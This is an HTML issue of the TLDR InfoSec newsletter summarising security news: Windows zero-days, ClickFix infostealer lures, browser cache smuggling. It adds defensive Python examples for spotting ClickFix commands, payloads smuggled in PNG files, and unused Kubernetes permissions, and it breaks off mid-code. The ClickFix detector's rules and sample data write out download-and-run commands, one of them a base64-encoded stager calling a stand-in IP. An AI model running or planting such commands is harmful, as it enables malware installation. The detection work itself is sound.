<!DOCTYPE html><html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="x-apple-disable-message-reformatting">
<title>TLDR InfoSec</title>
<meta name="color-scheme" content="light dark">
<meta name="supported-color-schemes" content="light dark">
<style type="text/css">
:root {
color-scheme: light dark; supported-color-schemes: light dark;
}
*,
*:after,
*:before {
-webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box;
}
* {
-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;
}
html,
body,
.document {
width: 100% !important; height: 100% !important; margin: 0; padding: 0;
}
body {
-webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-rendering: optimizeLegibility;
}
div[style*="margin: 16px 0"] {
margin: 0 !important;
}
table,
td {
mso-table-lspace: 0pt; mso-table-rspace: 0pt;
}
table {
border-spacing: 0; border-collapse: collapse; table-layout: fixed; margin: 0 auto;
}
img {
-ms-interpolation-mode: bicubic; max-width: 100%; border: 0;
}
*[x-apple-data-detectors] {
color: inherit !important; text-decoration: none !important;
}
.x-gmail-data-detectors,
.x-gmail-data-detectors *,
.aBn {
border-bottom: 0 !important; cursor: default !important;
}
.btn {
-webkit-transition: all 200ms ease; transition: all 200ms ease;
}
.btn:hover {
background-color: #f67575; border-color: #f67575;
}
* {
font-family: Arial, Helvetica, sans-serif; font-size: 18px;
}
@media screen and (max-width: 600px) {
.container {
width: 100%; margin: auto;
}
.stack {
display: block!important; width: 100%!important; max-width: 100%!important;
}
.btn {
display: block; width: 100%; text-align: center;
}
}
body,
p,
td,
tr,
.body,
table,
h1,
h2,
h3,
h4,
h5,
h6,
div,
span {
background-color: #FEFEFE !important; color: #010101 !important;
}
@media (prefers-color-scheme: dark) {
body,
p,
td,
tr,
.body,
table,
h1,
h2,
h3,
h4,
h5,
h6,
div,
span {
background-color: #27292D !important; color: #FEFEFE !important;
}
}
a {
color: inherit !important; text-decoration: underline !important;
}
</style>
<!--[if mso | ie]>
<style type="text/css">
a {
background-color: #FEFEFE !important; color: #010101 !important;
}
@media (prefers-color-scheme: dark) {
a {
background-color: #27292D !important; color: #FEFEFE !important;
}
}
</style>
<![endif]-->
</head>
<body class="">
<table align="center" class="document">
<tbody>
<tr>
<td valign="top">
<table align="center" border="0" cellpadding="0" cellspacing="0" class="container" width="600">
<tbody>
<tr class="inner-body">
<td>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr class="header">
<td bgcolor="" class="container">
<table width="100%">
<tbody>
<tr>
<td class="container">
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" style="margin-top: 0px;" width="100%">
<tbody>
<tr>
<td style="padding: 0px;">
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div style="text-align: center;">
<span style="margin-right: 0px;"><a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Ftldr.tech%2Finfosec%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/Xq7hrlXvrmvD3nVWomt8tYomV5aBn31MVF986PuXIJY=427" rel="noopener noreferrer" target="_blank"><span>Sign Up</span></a>
|<span style="margin-right: 2px; margin-left: 2px;"><a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fadvertise.tldr.tech%2F%3Futm_source=tldrinfosec%26utm_medium=newsletter%26utm_campaign=advertisetopnav/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/bQo4NLYoU-zTkiwd-HOKoUePlL1eTjJ11KLwdcvMy0Y=427" rel="noopener noreferrer" target="_blank"><span>Advertise</span></a></span>|<span style="margin-left: 2px;"><a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fa.tldrnewsletter.com%2Fweb-version%3Fep=1%26lc=156924ca-84b7-11f0-8d58-47c5c04ad337%26p=dffbd6e8-ada1-11f0-aff1-39f1696b0a19%26pt=campaign%26t=1760965664%26s=aa01646dffc525c73454f6193a9734e2a993e1229e4f8c11c53bd40c1b989bca/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/a2eqNZthtvjfRLw145u-eCgRnVS1Ls4L6EnJvVJkmYE=427"><span>View Online</span></a></span>
<br>
</span></div>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="text-align: center;"><span data-darkreader-inline-color="" style="--darkreader-inline-color:#3db3ff; color: rgb(51, 175, 255) !important; font-size: 30px;">T</span><span style="font-size: 30px;"><span data-darkreader-inline-color="" style="color: rgb(232, 192, 96) !important; --darkreader-inline-color:#e8c163; font-size:30px;">L</span><span data-darkreader-inline-color="" style="color: rgb(101, 195, 173) !important; --darkreader-inline-color:#6ec7b2; font-size:30px;">D</span></span><span data-darkreader-inline-color="" style="--darkreader-inline-color:#dd6e6e; color: rgb(220, 107, 107) !important; font-size: 30px;">R</span>
<br>
</td>
</tr>
</tbody>
</table>
<br>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr id="together-with">
<td align="center" height="20" style="vertical-align:middle !important;" valign="middle" width="100%"><strong style="vertical-align:middle !important; height: 100%;">Together With </strong>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Frippling.registration.goldcast.io%2Fwebinar%2F9b867911-e70c-49e4-8f59-dc2ce0fa76e0%3Futm_source=tldr%26utm_medium=newsletter%26utm_campaign=10%2F22%2Bdistributed%2Bdefense%2Bwebinar%26utm_content=webinar/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/wdXC9FTenz-nKCUOd8oHOm-mDIG0a5MgPkFlV9h-qI8=427"><img src="https://images.tldr.tech/rippling10201028.png" valign="middle" style="vertical-align: middle !important; height: 100%;" alt="Rippling"></a></td>
</tr>
</tbody>
</table>
<table style="table-layout: fixed; width:100%;" width="100%">
<tbody>
<tr>
<td style="padding:0;border-collapse:collapse;border-spacing:0;margin:0;">
<div style="text-align: center;">
<h1><strong>TLDR Information Security <span id="date">2025-10-20</span></strong></h1>
</div>
</td>
</tr>
</tbody>
</table>
<table style="table-layout: fixed; width:100%;" width="100%">
<tbody>
<tr id="sponsy-copy">
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Frippling.registration.goldcast.io%2Fwebinar%2F9b867911-e70c-49e4-8f59-dc2ce0fa76e0%3Futm_source=tldr%26utm_medium=newsletter%26utm_campaign=10%2F22%2Bdistributed%2Bdefense%2Bwebinar%26utm_content=webinar/2/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/jEo1sjnVdToL1EwOUmb2JdllPn80LKNBLlZEZFNwP6k=427">
<span>
<strong>Webinar: How growing companies can secure endpoints and devices for distributed workforces (Sponsor)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
As your company grows, you're forced to deal with more devices, more tools, and more complexity - often with the same limited resources.<p></p><p>This <a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Frippling.registration.goldcast.io%2Fwebinar%2F9b867911-e70c-49e4-8f59-dc2ce0fa76e0%3Futm_source=tldr%26utm_medium=newsletter%26utm_campaign=10%2F22%2Bdistributed%2Bdefense%2Bwebinar%26utm_content=webinar/3/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/BL4ydNnb_AixG6mNoX44XCoU3kOMF05vtew6fIQnbts=427" rel="noopener noreferrer nofollow" target="_blank"><span>Wednesday (10/22)</span></a>, <strong>Diana Health's</strong> Director of IT Jacob McGonigle, <strong>SentinelOne's</strong> Jay Ryerse, and <strong>Rippling IT</strong> GM Anique Drumright will share practical tips to simplify endpoint management and strengthen security. You'll learn how to:</p>
<ul>
<li>Gain complete visibility across distributed endpoints</li>
<li>Strengthen security without adding operational drag</li>
<li>Prove ROI on security investments to leadership</li>
</ul>
<p><a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Frippling.registration.goldcast.io%2Fwebinar%2F9b867911-e70c-49e4-8f59-dc2ce0fa76e0%3Futm_source=tldr%26utm_medium=newsletter%26utm_campaign=10%2F22%2Bdistributed%2Bdefense%2Bwebinar%26utm_content=webinar/4/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/cMzdCcWhcQwIil_ZmdiXyqhvf7y3cBfH8BTV8-K-GLc=427" rel="noopener noreferrer nofollow" target="_blank"><span>Register here →</span></a></p>
<p>💡 <strong>While you wait for Wednesday's webinar</strong>, check out <a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.rippling.com%2Fresources%2Fit-operations-survey-2025%3Futm_source=tldr%26utm_medium=newsletter%26utm_campaign=2025%2520it%2520ops%2520report%26utm_content=gated%2520content/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/dW5Bk-bvxCwOWqoJmRa6kA3jbWUvvEQWBRBwoGXj_CE=427" rel="noopener noreferrer nofollow" target="_blank"><span><strong>Rippling IT's 2025 IT Ops Report</strong></span></a>.
</p>
</span></span></div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr bgcolor="">
<td class="container">
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td style="padding: 0px;">
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;"><span style="font-size: 36px;">🔓</span></div></div>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;">
<h1><strong>Attacks & Vulnerabilities</strong></h1>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<table style="table-layout: fixed; width: 100%;" width="100%">
<tbody>
<tr>
<td style="padding:0;border-collapse:collapse;border-spacing:0;margin:0;" valign="top">
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fthehackernews.com%2F2025%2F10%2Ftwo-new-windows-zero-days-exploited-in.html%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/GEIydJo3nUmUmOHP7SKoGqI7YtezRzn7Xq_50U8JDX4=427">
<span>
<strong>Two New Windows Zero-Days Exploited in the Wild - One Affects Every Version Ever Shipped (3 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
Microsoft's October Patch Tuesday, the last one for Windows 10, fixed three actively exploited vulnerabilities. One is a Secure Boot bypass; the other two are privilege escalation bugs. The notable one lives in a legacy third-party modem driver that has shipped with every version of Windows, so a local attacker on any Windows release could use it to gain administrator privileges. Microsoft removed the driver outright rather than patching it, which also means fax modems that depend on it stop working once the update is installed.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fgoogle-ads-for-fake-homebrew-logmein-sites-push-infostealers%2F%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/x0NbkXuFjjn4QHqR9KFCbCdahiNv286Qxa7tF5YM3hE=427">
<span>
<strong>Google Ads for Fake Homebrew, LogMeIn Sites Push Infostealers (2 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
Researchers at threat hunting company Hunt.io have uncovered a malware campaign that combines ClickFix social engineering with impersonation of popular software. Google Ads lead to lookalike sites for Homebrew, LogMeIn, and TradingView that tell macOS users to copy a command and run it in Terminal; that command fetches and installs either the Odyssey or the AMOS infostealer, which then harvests credentials from the machine.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
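<p>As an added example (not code from Hunt.io or the article), the following Python applies detection logic to constructed command-line telemetry of the kind an EDR or shell-history collector produces, flagging the building blocks of a ClickFix lure: a download piped straight into a shell, a base64 blob decoded into a shell, an osascript password prompt, and removal of the macOS quarantine flag. The hosts, domains, rule patterns and the embedded stager are all made up for the example; they are generic heuristics for the technique, not indicators from this campaign.</p>

```python
"""Flag ClickFix-style "paste this into Terminal" one-liners in command-line
telemetry (shell history, EDR process events).

Added example for this digest, not code from Hunt.io or the article. The
events below are constructed, and the patterns are generic heuristics for
the technique, not the campaign's actual indicators."""
import base64
import re
from dataclasses import dataclass

# (rule name, regex). Each rule is a common building block of a ClickFix lure.
RULES = [
    ("pipe_download_to_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    ("base64_decode_to_shell",
     re.compile(r"base64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    ("osascript_password_prompt",
     re.compile(r"osascript\s+-e\b.*display dialog.*(password|hidden answer)", re.I)),
    ("quarantine_flag_removed",
     re.compile(r"xattr\s+(-d|-c|-r)\b.*com\.apple\.quarantine")),
]
# A run of base64 alphabet long enough to be a hidden command rather than a hash or a flag.
BASE64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    command: str
    decoded: str  # decoded base64 blob found in the command, or ""


def decode_embedded_base64(command: str) -> str:
    """Return the first base64 token in `command` that decodes to printable text."""
    for token in BASE64_TOKEN.findall(command):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64 (bad length or padding) or binary content
        if text.isprintable():
            return text
    return ""


def scan(events):
    """events: iterable of (host, user, command_line).
    Returns one Finding per rule that matches either the raw command or a
    base64 blob decoded from it, so one command can yield several findings."""
    findings = []
    for host, user, command in events:
        decoded = decode_embedded_base64(command)
        for name, pattern in RULES:
            if pattern.search(command) or (decoded and pattern.search(decoded)):
                findings.append(Finding(host, user, name, command, decoded))
    return findings


# Constructed telemetry. The stager hidden in mac-02's blob is encoded here so
# the sample stays readable; a real lure ships it pre-encoded.
HIDDEN_STAGER = base64.b64encode(b"curl -s http://198.51.100.7/agent | bash").decode()
SAMPLE_EVENTS = [
    ("mac-01", "alice", "curl -fsSL https://brew-install.example.invalid/install.sh | bash"),
    ("mac-02", "bob", f'echo "{HIDDEN_STAGER}" | base64 -d | sh'),
    ("mac-03", "carol", "git status"),
    ("mac-04", "dave", "osascript -e 'display dialog \"Update requires your password\" "
                       "default answer \"\" with hidden answer'"),
    ("mac-05", "erin", "xattr -d com.apple.quarantine ~/Downloads/LogMeInInstaller.dmg"),
    ("mac-06", "frank", "brew install wget"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        extra = f"  [decoded: {f.decoded}]" if f.decoded else ""
        print(f"{f.host} {f.user} {f.rule}: {f.command}{extra}")
```

<p>The decode step matters: the second sample never mentions curl in the visible command, so a rule that only looks at the raw string misses the download-and-execute hidden in the blob. Running the same rules over the decoded text catches it.</p>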
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.securityweek.com%2Fprosper-data-breach-impacts-17-6-million-accounts%2F%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/_EExM9WWQwaBRKw5WELrdXOnGhwAXLUPKXGp34Baw1c=427">
<span>
<strong>Prosper Data Breach Impacts 17.6 Million Accounts (2 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
Hackers stole personal and financial details belonging to 17.6 million users of the Prosper lending platform, including Social Security numbers and government IDs. Prosper says attackers took data from its database but did not access accounts or funds.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;"><span style="font-size: 36px;">🧠</span></div>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;">
<h1><strong>Strategies & Tactics</strong></h1>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<table style="table-layout: fixed; width: 100%;" width="100%">
<tbody>
<tr>
<td style="padding:0;border-collapse:collapse;border-spacing:0;margin:0;" valign="top">
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fhackaday.com%2F2025%2F10%2F18%2Fhacking-a-banned-chinese-security-camera%2F%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/kt2nd0WkmjTYzMhpwdxlV8iLmcF-Fs3SNEVrBsnmYR0=427">
<span>
<strong>Hacking A Banned Chinese Security Camera (1 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
A security researcher ran man-in-the-middle attacks against a Chinese security camera that is banned in the US and found that the device does not properly validate the server's certificate chain and streams its video unencrypted over UDP. Those flaws are bad enough, but the article argues that the real issue behind the ban is the camera's automatic firmware update channel, which lets the manufacturer push arbitrary code to the device at any time. The lesson generalizes: a device with several exploitable bugs may still pose its largest risk through an update mechanism the owner can neither disable nor audit.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.zerosalarium.com%2F2025%2F10%2Fdefenderwrite-abusing-whitelisted-programs-arbitrary-write.html%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/Vm1k20FnYVsmoJQ7E5-jn_rC5Xc9w8wc853uczrqmiI=427">
<span>
<strong>DefenderWrite: Abusing Whitelisted Programs for Arbitrary Writes (4 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
An antivirus product's own folders are normally protected so that other processes cannot write into them, but the self-protection exempts a set of whitelisted executables. DefenderWrite is a tool that enumerates which executables on a host can write files into the protected folders of Windows Defender and other major AVs, and uses them to do so without an exploit. By scanning every .exe on the system and testing each one's write capability, it shows that a "protected" folder can still receive attacker-controlled files, which makes it attractive for stealthy persistence because few defenders expect changes there.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fmedium.com%2F@dnem__%2Frevisiting-browser-cache-smuggling-1a8ab374d55e%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/u-rWLs4gkXk8vAwoQ-FQxIJw_mK6EbH-DKxWINF9_qM=427">
<span>
<strong>Revisiting Browser Cache Smuggling (3 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
Browser cache smuggling abuses the browser's own cache to get a payload onto a victim's disk: the victim visits a page, the browser caches an image or other resource as it normally would, and the attacker's payload rides along inside that cached file. The write-up pairs this with COM hijacking, registering a malicious DLL under a per-user CLSID key in the Windows registry so that the browser loads it on every start, which gives persistent code execution without a conventional download. Steganography hides further payloads inside the cached images, so the files still look like ordinary image data. Because nothing is fetched outside the browser and no new executable appears on disk, the chain sidesteps detections that key on downloads or dropped binaries and leaves few obvious traces.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
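<p>The steganographic half of that chain relies on image decoders ignoring what they do not need. As an added example (not code from the article), the Python below builds a minimal PNG in memory, then checks a file the way a cache or mail scanner could: it walks the chunk list, verifies each chunk's CRC, measures bytes parked in ancillary chunks, and reports anything left after IEND, where a decoder stops reading. The fake MZ stub, the private "stEg" chunk and the 4 KiB ancillary budget are assumptions made for the example.</p>

```python
"""Spot a payload smuggled behind a valid PNG, the steganographic half of the
browser-cache-smuggling chain: the image decodes and renders normally, the
payload sits where decoders never look.

Added example for this digest, not code from the article. The PNG is built
in memory, the "payload" is a fake MZ stub, and the ancillary-chunk budget
is an illustrative threshold."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
CRITICAL_CHUNKS = {b"IHDR", b"PLTE", b"IDAT", b"IEND"}


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """length | type | data | CRC32(type + data), as the PNG spec lays it out."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_png(width: int = 1, height: int = 1, extra_chunks=()) -> bytes:
    """Smallest well-formed 8-bit greyscale PNG; extra_chunks are placed before IDAT."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    raw = b"".join(b"\x00" + b"\x80" * width for _ in range(height))  # filter byte per row
    extra = b"".join(_chunk(t, b) for t, b in extra_chunks)
    return (PNG_SIG + _chunk(b"IHDR", ihdr) + extra
            + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b""))


def parse_png(data: bytes) -> dict:
    """Walk the chunk list and measure everything a decoder would silently ignore."""
    if not data.startswith(PNG_SIG):
        return {"is_png": False}
    pos = len(PNG_SIG)
    chunks, bad_crc = [], []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(body) < length or len(crc) < 4:
            break  # truncated chunk; whatever follows is not a valid chunk
        if struct.unpack(">I", crc)[0] != (zlib.crc32(ctype + body) & 0xFFFFFFFF):
            bad_crc.append(ctype)  # data patched after the fact without fixing the CRC
        chunks.append((ctype, length))
        pos += 12 + length
        if ctype == b"IEND":
            break  # decoders stop here; bytes after this point are never rendered
    trailing = data[pos:]
    return {
        "is_png": True,
        "chunks": chunks,
        "bad_crc": bad_crc,
        "trailing_bytes": len(trailing),
        "trailing_head": trailing[:4],
        "ancillary_bytes": sum(n for t, n in chunks if t not in CRITICAL_CHUNKS),
    }


def verdict(report: dict, max_ancillary: int = 4096) -> list:
    """Reasons to pull the file for analysis; an empty list means nothing stood out."""
    if not report.get("is_png"):
        return ["not a PNG"]
    reasons = []
    if report["trailing_bytes"]:
        reasons.append(f"{report['trailing_bytes']} bytes after IEND")
        if report["trailing_head"].startswith(b"MZ"):
            reasons.append("trailing data starts with MZ (PE header)")
    if report["bad_crc"]:
        reasons.append("chunk CRC mismatch: " + ",".join(t.decode() for t in report["bad_crc"]))
    if report["ancillary_bytes"] > max_ancillary:
        reasons.append(f"{report['ancillary_bytes']} bytes in ancillary chunks")
    return reasons


# Constructed samples: a clean image, the same image with a fake PE appended, and
# one carrying 8 KiB in a private ancillary chunk (lower-case first letter = optional).
CLEAN_PNG = build_png()
SMUGGLED_PNG = CLEAN_PNG + b"MZ\x90\x00" + b"\x00" * 2048
CHUNK_HIDDEN_PNG = build_png(extra_chunks=[(b"stEg", b"\x00" * 8192)])

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_PNG), ("appended", SMUGGLED_PNG), ("chunk", CHUNK_HIDDEN_PNG)):
        print(label, verdict(parse_png(blob)) or "ok")
```

<p>Both smuggled variants are pixel-for-pixel identical to the clean image when rendered, which is the point of the technique; the scanner has to look at the container, not the picture.</p>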
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;"><span style="font-size: 36px;">🧑‍💻</span></div>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;">
<h1><strong>Launches & Tools</strong></h1>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<table style="table-layout: fixed; width: 100%;" width="100%">
<tbody>
<tr>
<td style="padding:0;border-collapse:collapse;border-spacing:0;margin:0;" valign="top">
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fsemgrep.dev%2Fresources%2Fsemgrep-vs-snyk%3Futm_source=tldr%26utm_medium=paidsocial/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/Nev0mGT98ue0EeIhrYhLnufCnag-YQJCPRRMC8bAYec=427">
<span>
<strong>Everyone promises to reduce AppSec alert noise. Here's how Semgrep actually achieves it (Sponsor)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
<strong>Semgrep's AI isn't just an API call to an LLM - it confidently handles around 60% of SAST triage for customers, with a 96% human-agree rate. This means security teams can spend all of their time on the issues that matter, without worrying that they've missed out on any real issues. </strong><a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fsemgrep.dev%2Fresources%2Fsemgrep-vs-snyk%3Futm_source=tldr%26utm_medium=paidsocial/2/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/mNi7p4BfqR_s0IUX-MmPpZvSgtZ5AqDQCIzwNnvAX4w=427" rel="noopener noreferrer nofollow" target="_blank"><span>See how Semgrep compares to competitors.</span></a>
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fgithub.com%2FPaloAltoNetworks%2FKIEMPossible%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/y0ZtCttdxIUpNJE_rWdLGKL0bIePovwOut9Dohn84Dk=427">
<span>
<strong>KIEMPossible (GitHub Repo)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
KIEMPossible is a Kubernetes Infrastructure Entitlement Management tool from Palo Alto Networks that shows which permissions exist across clusters and which are actually used. It reads RBAC configuration and audit logs from AWS EKS, Azure AKS, GCP GKE, and local clusters, flattens roles and bindings into granular per-subject, per-verb, per-resource entries, correlates each entry with the audit log to record when it was last exercised, and stores the result in a MySQL database. It maps workload identities, follows group inheritance, and reports entities that hold dangerous permissions they never use, which makes it easier to reduce attack surface without breaking legitimate access.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
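<p>The flatten-then-correlate idea is easy to show in miniature. As an added example (not Palo Alto Networks' code), the Python below expands constructed Role and ClusterRole bindings into granular (subject, verb, resource, namespace) rows, stamps each row with the latest matching event from a constructed kube-apiserver audit log, and lists rows that touch sensitive resources but were never exercised. The manifests are cut down to the fields a flattener needs, and DANGEROUS_RESOURCES is an illustrative list rather than the tool's own.</p>

```python
"""Flatten Kubernetes RBAC into (subject, verb, resource, namespace) rows and
stamp each row with the last time the audit log shows it being used, the
core of what the KIEMPossible README describes.

Added example for this digest, not Palo Alto Networks' code. The roles,
bindings and audit events are constructed and cut down to the fields a
flattener needs; DANGEROUS_RESOURCES is an illustrative list."""
import json

ALL_VERBS = ["get", "list", "watch", "create", "update", "patch", "delete", "deletecollection"]
DANGEROUS_RESOURCES = {"secrets", "pods/exec", "clusterrolebindings"}

# Constructed manifests. roleRef carries the kind so a RoleBinding may point at a ClusterRole.
ROLES = [
    {"kind": "Role", "name": "reader", "namespace": "payments",
     "rules": [{"verbs": ["get", "list"], "resources": ["pods", "configmaps"]}]},
    {"kind": "ClusterRole", "name": "secret-admin",
     "rules": [{"verbs": ["*"], "resources": ["secrets"]}]},
]
BINDINGS = [
    {"kind": "RoleBinding", "namespace": "payments",
     "roleRef": {"kind": "Role", "name": "reader"},
     "subjects": ["system:serviceaccount:payments:api"]},
    {"kind": "ClusterRoleBinding",
     "roleRef": {"kind": "ClusterRole", "name": "secret-admin"},
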